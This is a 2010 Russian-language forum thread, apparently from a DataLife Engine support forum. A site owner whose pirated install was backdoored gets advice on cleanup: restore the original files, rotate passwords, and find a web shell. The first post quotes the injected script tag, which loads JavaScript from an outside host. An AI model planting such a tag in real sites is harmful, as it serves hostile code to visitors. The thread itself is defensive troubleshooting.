Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Какой раз уже удаляю код, но они снова взламывают <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7778"></script> это скрипт который прописали на сайте стоит Dle 9 , где может быть дыра? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 990 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Molderjkee, Пользовались нелегальной копией скрипта до этого? У вас лицензии всего полтора дня. Восстанавливайте все лицензионные оригинальные файлы скрипта на сервере, проверяйте антивирусом встроенном в админпанель и удаляйте все файлы на которые он укажет. Цитата Ссылка на сообщение Поделиться на других сайтах
Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Автор да пользовался нелегальной версиейхорошо попробую Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 990 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 да пользовался нелегальной версией бекдоры в них обычное дело, после замены всех файлов, не забудьте сменить все пароли, в том числе и на MySQL и FTP. проверьте тщательно настройки групп и всех пользователей кто имеет доступ в админпанель, чтобы не было лишних. Если были сторонние модули, то не ставьте их повторно. Скорее всего на сервере теперь есть шелл, его нужно найти и удалить Цитата Ссылка на сообщение Поделиться на других сайтах
Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Автор celsoft, а как сменить в dle пароль от MySQL Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 990 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Molderjkee, в файле engine/data/dbconfig.php Цитата Ссылка на сообщение Поделиться на других сайтах
Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 (изменено) Автор вот скрин, что нашёл антивирусник Значит вируса нету?последний файл фото думаю вирус, так как его нету в папке , где он может быть? Изменено 20 ноября 2010 пользователем Molderjkee Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Я никак не могу понять почему одни файлы подсвечивает красным, а другие синим. В этом есть какая-то логика? Объясните пожалуйста, кто знает Заранее спасибо за ответ Цитата Ссылка на сообщение Поделиться на других сайтах
Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 (изменено) Автор короче нашёл вирус в файле foto_156982.php там нашёл Web Shell Изменено 20 ноября 2010 пользователем Molderjkee Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 990 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Я никак не могу понять почему одни файлы подсвечивает красным, а другие синим. В этом есть какая-то логика? Объясните пожалуйста, кто знает Степень предполагаемой опасности, зависит от размера файла, например файлы шеллов маленькими не бывают, поэтому оони выделяются синим или красным цветом, в зависимости от размера. Но это вовсе не означает что зеленые файлы безопасны. короче нашёл вирус в файле foto_156982.php там нашёл Web Shell вам нужно удалять все файлы на которые указывает антивирус, и которые не принадлежат скрипту, шелл могли залить и через эти сторонние модули. Цитата Ссылка на сообщение Поделиться на других сайтах
Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Автор вот еще вопрос , у меня скрипты есть на JS , но не знаю что делать , так как они мне нужны и из-за этих скриптов не работает панель html при добавление новостей Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 990 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 Molderjkee, какие скрипты? Цитата Ссылка на сообщение Поделиться на других сайтах
Molderjkee 0 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 (изменено) Автор celsoft, меню которое раскладывается оно как бы блокирует другие скрипты вот скрипт <script language="javascript" src="{THEME}/css/mootools.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/slimbox.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/yt_tools.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/base.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/morph.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/accordionmenu.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/slidepanel.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/styleswitcher.js" type="text/javascript"></script> <script language="javascript" src="{THEME}/css/js/spotlight.js" type="text/javascript"></script> <!--[if lt IE 7]> <script language="javascript" defer src="/templates/loom/lib/js/yt_ie6fix.js" type="text/javascript"></script> <![endif]--> <script type="text/javascript" src="{THEME}/css/mw_hint.js"></script>может есть какой не будь способ не убирая их , сделать чтобы работало? Изменено 20 ноября 2010 пользователем Molderjkee Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 990 Опубликовано: 20 ноября 2010 Рассказать Опубликовано: 20 ноября 2010 <script language="javascript" src="{THEME}/css/mootools.js" type="text/javascript"></script> фреймворк mootols несовместим с Jquery который используется в скрипте, вам необходимо заменить плагины этого фреймворка на аналогичные плагины для Jquery. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.